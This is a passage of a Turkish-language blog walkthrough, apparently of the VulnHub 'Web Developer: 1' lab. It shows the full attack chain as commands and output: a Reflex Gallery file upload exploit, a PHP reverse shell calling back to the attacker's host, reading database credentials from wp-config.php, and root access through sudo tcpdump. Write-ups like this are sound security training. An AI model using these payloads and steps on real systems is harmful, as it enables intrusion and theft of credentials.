wordpress'e y\u00fckledim. Daha sonras\u0131nda exploit a\u00e7\u0131klamas\u0131n\u0131 okudum.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# searchsploit reflex gallery          \n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nWordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit)                                                                                                                                        | php\/remote\/36809.rb\nWordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload                                                                                                                                               | php\/webapps\/36374.txt\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# locate php\/webapps\/36374.txt\n\/usr\/share\/exploitdb\/exploits\/php\/webapps\/36374.txt\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# cat \/usr\/share\/exploitdb\/exploits\/php\/webapps\/36374.txt\n# Exploit Title: WordPress Plugin Reflex Gallery - Arbitrary File Upload\n# Google Dork: inurl:wp-content\/plugins\/reflex-gallery\/\n# Date: 08.03.2015\n# Exploit Author: CrashBandicot @DosPerl\n# Vendor Homepage: https:\/\/wordpress.org\/plugins\/reflex-gallery\/\n# Software Link: https:\/\/downloads.wordpress.org\/plugin\/reflex-gallery.zip\n# Version: 3.1.3 (Last)\n# Tested on: Windows\n\n# p0C : http:\/\/i.imgur.com\/mj8yADU.png\n\n# Path : wp-content\/plugins\/reflex-gallery\/admin\/scripts\/FileUploader\/php.php\n# add Month and Year in GET for Folder of Shell .\/wp-content\/uploads\/&quot; .$_GET[&#039;Year&#039;].&#039;\/&#039;.$_GET[&#039;Month&#039;]. &quot;\n\nVulnerable File : php.php\n50.      if(!move_uploaded_file($_FILES[&#039;qqfile&#039;][&#039;tmp_name&#039;], $path)){\n173.         $result = $uploader-&gt;handleUpload(&#039;..\/..\/..\/..\/..\/uploads\/&#039;.$_GET[&#039;Year&#039;].&#039;\/&#039;.$_GET[&#039;Month&#039;].&#039;\/&#039;);\n\n# Exploit :\n\n&lt;form method=&quot;POST&quot; action=&quot;http:\/\/127.0.0.1:1337\/wordpress\/wp-content\/plugins\/reflex-gallery\/admin\/scripts\/FileUploader\/php.php?Year=2015&amp;Month=03&quot; enctype=&quot;multipart\/form-data&quot; &gt;\n    &lt;input type=&quot;file&quot; name=&quot;qqfile&quot;&gt;&lt;br&gt;\n    &lt;input type=&quot;submit&quot; name=&quot;Submit&quot; value=&quot;Pwn!&quot;&gt;\n&lt;\/form&gt;\n\n# Shell Path : http:\/\/127.0.0.1:1337\/wordpress\/wp-content\/uploads\/2015\/03\/backdoor.php <\/code><\/pre>\n<p>Ortam\u0131ma uygun html kodumu yazd\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# cat exploit.html                                       \n&lt;html&gt;\n&lt;body&gt;&lt;!--2021\/06\/--&gt;\n&lt;form method=&quot;POST&quot; action=&quot;http:\/\/192.168.31.147\/wp-content\/plugins\/reflex-gallery\/admin\/scripts\/FileUploader\/php.php?Year=2021&amp;Month=06&quot; enctype=&quot;multipart\/form-data&quot; &gt;\n    &lt;input type=&quot;file&quot; name=&quot;qqfile&quot;&gt;&lt;br&gt;\n    &lt;input type=&quot;submit&quot; name=&quot;Submit&quot; value=&quot;Pwn!&quot;&gt;\n&lt;\/form&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>Daha sonra python http server ile servis ettim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# python3 -m http.server \nServing HTTP on 0.0.0.0 port 8000 (http:\/\/0.0.0.0:8000\/) ...\n127.0.0.1 - - [22\/Jun\/2021 16:40:48] &quot;GET \/exploit.html HTTP\/1.1&quot; 200 -\n<\/code><\/pre>\n<p>Hepsini g\u00f6stermeyece\u011fim pentester monkey'den php reverse'\u00fcm\u00fc ald\u0131m ve exploit.html'e y\u00fckledim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop]\n\u2514\u2500# head -n 50 backdoor.php\n&lt;?php\n\/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n\/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\/\/\n\/\/ This tool may be used for legal purposes only.  Users take full responsibility\n\/\/ for any actions performed using this tool.  The author accepts no liability\n\/\/ for damage caused by this tool.  If these terms are not acceptable to you, then\n\/\/ do not use this tool.\n\/\/\n\/\/ In all other respects the GPL version 2 applies:\n\/\/\n\/\/ This program is free software; you can redistribute it and\/or modify\n\/\/ it under the terms of the GNU General Public License version 2 as\n\/\/ published by the Free Software Foundation.\n\/\/\n\/\/ This program is distributed in the hope that it will be useful,\n\/\/ but WITHOUT ANY WARRANTY; without even the implied warranty of\n\/\/ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n\/\/ GNU General Public License for more details.\n\/\/\n\/\/ You should have received a copy of the GNU General Public License along\n\/\/ with this program; if not, write to the Free Software Foundation, Inc.,\n\/\/ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n\/\/\n\/\/ This tool may be used for legal purposes only.  Users take full responsibility\n\/\/ for any actions performed using this tool.  If these terms are not acceptable to\n\/\/ you, then do not use this tool.\n\/\/\n\/\/ You are encouraged to send comments, improvements or suggestions to\n\/\/ me at pentestmonkey@pentestmonkey.net\n\/\/\n\/\/ Description\n\/\/ -----------\n\/\/ This script will make an outbound TCP connection to a hardcoded IP and port.\n\/\/ The recipient will be given a shell running as the current user (apache normally).\n\/\/\n\/\/ Limitations\n\/\/ -----------\n\/\/ proc_open and stream_set_blocking require PHP version 4.3+, or 5+\n\/\/ Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.\n\/\/ Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.\n\/\/\n\/\/ Usage\n\/\/ -----\n\/\/ See http:\/\/pentestmonkey.net\/tools\/php-reverse-shell if you get stuck.\n\nset_time_limit (0);\n$VERSION = &quot;1.0&quot;;\n$ip = &#039;192.168.31.130&#039;;  \/\/ CHANGE THIS\n$port = 1822;       \/\/ CHANGE THIS\n<\/code><\/pre>\n<p>Bunun \u00fczerine web servis bana \u015f\u00f6yle bir cevap verdi.<\/p>\n<pre><code class=\"language-html\">{&quot;success&quot;:true,&quot;fileName&quot;:&quot;\\\/2021\\\/06\\\/backdoor.php&quot;}<\/code><\/pre>\n<p>Harika \u015fimdi reverse alal\u0131m. <strong>192.168.31.147\/wp-content\/uploads\/2021\/06\/backdoor.php<\/strong> adresini tetikledim. \u00d6ncesinde tabikide 1822'de dinleme noktas\u0131 ba\u015flatt\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nc -lvp 1822                                                                                                                                                                                                                          1 \u2a2f\nlistening on [any] 1822 ...\n192.168.31.147: inverse host lookup failed: Unknown host\nconnect to [192.168.31.130] from (UNKNOWN) [192.168.31.147] 50900\nLinux webdeveloper 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU\/Linux\n 20:47:13 up  2:21,  0 users,  load average: 0.20, 0.18, 0.08\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\/bin\/sh: 0: can&#039;t access tty; job control turned off\n<\/code><\/pre>\n<p>WordPress oldu\u011fu i\u00e7in config dosyas\u0131n\u0131 okumaya karar verdim.<\/p>\n<pre><code class=\"language-sh\">$ cd \/var\/wwww\n\/bin\/sh: 11: cd: can&#039;t cd to \/var\/wwww\n$ cd \/var\/www\n$ ls\nhtml\n$ cd html\n$ ls\nindex.php\nipdata\nlicense.txt\nreadme.html\nwp-activate.php\nwp-admin\nwp-blog-header.php\nwp-comments-post.php\nwp-config-sample.php\nwp-config.php\nwp-content\nwp-cron.php\nwp-includes\nwp-links-opml.php\nwp-load.php\nwp-login.php\nwp-mail.php\nwp-settings.php\nwp-signup.php\nwp-trackback.php\nxmlrpc.php\n$ cat wp-config.php\n&lt;?php\n\/**\n * The base configuration for WordPress\n *\n * The wp-config.php creation script uses this file during the\n * installation. You don&#039;t have to use the web site, you can\n * copy this file to &quot;wp-config.php&quot; and fill in the values.\n *\n * This file contains the following configurations:\n *\n * * MySQL settings\n * * Secret keys\n * * Database table prefix\n * * ABSPATH\n *\n * @link https:\/\/codex.wordpress.org\/Editing_wp-config.php\n *\n * @package WordPress\n *\/\n\n\/\/ ** MySQL settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine(&#039;DB_NAME&#039;, &#039;wordpress&#039;);\n\n\/** MySQL database username *\/\ndefine(&#039;DB_USER&#039;, &#039;webdeveloper&#039;);\n\n\/** MySQL database password *\/\ndefine(&#039;DB_PASSWORD&#039;, &#039;MasterOfTheUniverse&#039;);\n\n\/** MySQL hostname *\/\ndefine(&#039;DB_HOST&#039;, &#039;localhost&#039;);\n\n\/** Database Charset to use in creating database tables. *\/\ndefine(&#039;DB_CHARSET&#039;, &#039;utf8mb4&#039;);\n\n....<\/code><\/pre>\n<p>Bu kullan\u0131c\u0131 bilgileri ile ssh yapabildim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ssh webdeveloper@192.168.31.147\nwebdeveloper@192.168.31.147&#039;s password: \nWelcome to Ubuntu 18.04.1 LTS (GNU\/Linux 4.15.0-38-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n System information disabled due to load higher than 1.0\n\n * Security certifications for Ubuntu!\n   We now have FIPS, STIG, CC and a CIS Benchmark.\n\n   - http:\/\/bit.ly\/Security_Certification\n\n * Want to make a highly secure kiosk, smart display or touchscreen?\n   Here&#039;s a step-by-step tutorial for a rainy weekend, or a startup.\n\n   - https:\/\/bit.ly\/secure-kiosk\n\n0 packages can be updated.\n0 updates are security updates.\n\nNew release &#039;20.04.2 LTS&#039; available.\nRun &#039;do-release-upgrade&#039; to upgrade to it.\n\nLast login: Tue Jun 22 20:53:48 2021 from 192.168.31.130\nwebdeveloper@webdeveloper:~$ \n<\/code><\/pre>\n<p>Her zaman kulland\u0131m lse.sh enum script ile incelemeler yapt\u0131m ve ilgin\u00e7 bir \u015fey buldum.<\/p>\n<pre><code class=\"language-sh\">webdeveloper@webdeveloper:~$ sudo -l\n[sudo] password for webdeveloper: \nMatching Defaults entries for webdeveloper on webdeveloper:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser webdeveloper may run the following commands on webdeveloper:\n    (root) \/usr\/sbin\/tcpdump\n<\/code><\/pre>\n<p>Harika \u015fimdi root olal\u0131m.<\/p>\n<pre><code class=\"language-sh\">webdeveloper@webdeveloper:\/tmp$ echo $&#039;whoami&#039; &gt; \/tmp\/.test\nwebdeveloper@webdeveloper:\/tmp$ chmod +x \/tmp\/.test\nwebdeveloper@webdeveloper:\/tmp$ sudo tcpdump -ln -i eth0 -w \/dev\/null -W 1 -G 1 -z \/tmp\/.test -Z root\ndropped privs to root\ntcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes\nMaximum file limit reached: 1\n1 packet captured\n12 packets received by filter\n0 packets dropped by kernel\nwebdeveloper@webdeveloper:\/tmp$ root\n<\/code><\/pre>\n<p>Ve root haklar\u0131nda kod \u00e7al\u0131\u015ft\u0131rd\u0131k.<\/p>\n<pre><code class=\"language-sh\">webdeveloper@webdeveloper:\/tmp$ echo $&#039;id\\nusermod -a -G sudo webdeveloper&#039; &gt; \/tmp\/.test\nwebdeveloper@webdeveloper:\/tmp$ chmod +x \/tmp\/.test\nwebdeveloper@webdeveloper:\/tmp$ sudo tcpdump -ln -i eth0 -w \/dev\/null -W 1 -G 1 -z \/tmp\/.test -Z root\n[sudo] password for webdeveloper: \ndropped privs to root\ntcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes\nMaximum file limit reached: 1\n1 packet captured\n12 packets received by filter\n0 packets dropped by kernel<\/code><\/pre>\n<p>\u015eimdi root olal\u0131m.<\/p>\n<pre><code class=\"language-sh\">webdeveloper@webdeveloper:\/tmp$ exit\nlogout\nConnection to 192.168.31.147 closed.\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ssh webdeveloper@192.168.31.147\nwebdeveloper@192.168.31.147&#039;s password: \nWelcome to Ubuntu 18.04.1 LTS (GNU\/Linux 4.15.0-38-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Tue Jun 22 22:20:59 UTC 2021\n\n  System load:  0.0                Processes:           99\n  Usage of \/:   23.3% of 19.56GB   Users logged in:     0\n  Memory usage: 65%                IP address for eth0: 192.168.31.147\n  Swap usage:   0%\n\n * Security certifications for Ubuntu!\n   We now have FIPS, STIG, CC and a CIS Benchmark.\n\n   - http:\/\/bit.ly\/Security_Certification\n\n * Want to make a highly secure kiosk, smart display or touchscreen?\n   Here&#039;s a step-by-step tutorial for a rainy weekend, or a startup.\n\n   - https:\/\/bit.ly\/secure-kiosk\n\n0 packages can be updated.\n0 updates are security updates.\n\nNew release &#039;20.04.2 LTS&#039; available.\nRun &#039;do-release-upgrade&#039; to upgrade to it.\n\nLast login: Tue Jun 22 21:46:26 2021 from 192.168.31.130\nwebdeveloper@webdeveloper:~$ sudo su\n[sudo] password for webdeveloper: \nroot@webdeveloper:\/home\/webdeveloper# cd \/root\nroot@webdeveloper:~# ls\nflag.txt\nroot@webdeveloper:~# cat flag.txt \nCongratulations here is youre flag:\ncba045a5a4f26f1cd8d7be9a5c2b1b34f6c5d290<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Hakk\u0131nda Bilgiler A\u00e7\u0131klama: A machine using the newest REMOVED Server, the newest REMOVED and containing some REMOVED&#8230;. Vulnhub Sayfas\u0131: https:\/\/www.vulnhub.com\/entry\/web-developer-1,288\/ \u0130ndirme Sayfas\u0131: https:\/\/download.vulnhub.com\/webdeveloper\/WebDeveloper.ova Walkthrough&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/06\/22\/web-developer-1\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">WEB DEVELOPER: 1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[518,206,527],"class_list":["post-1231","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-tcpdump","tag-wordpress","tag-wordpress-pluggin","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1231","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1231"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1231\/revisions"}],"predecessor-version":[{"id":1232,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1231\/revisions\/1232"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1231"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1231"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1231"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}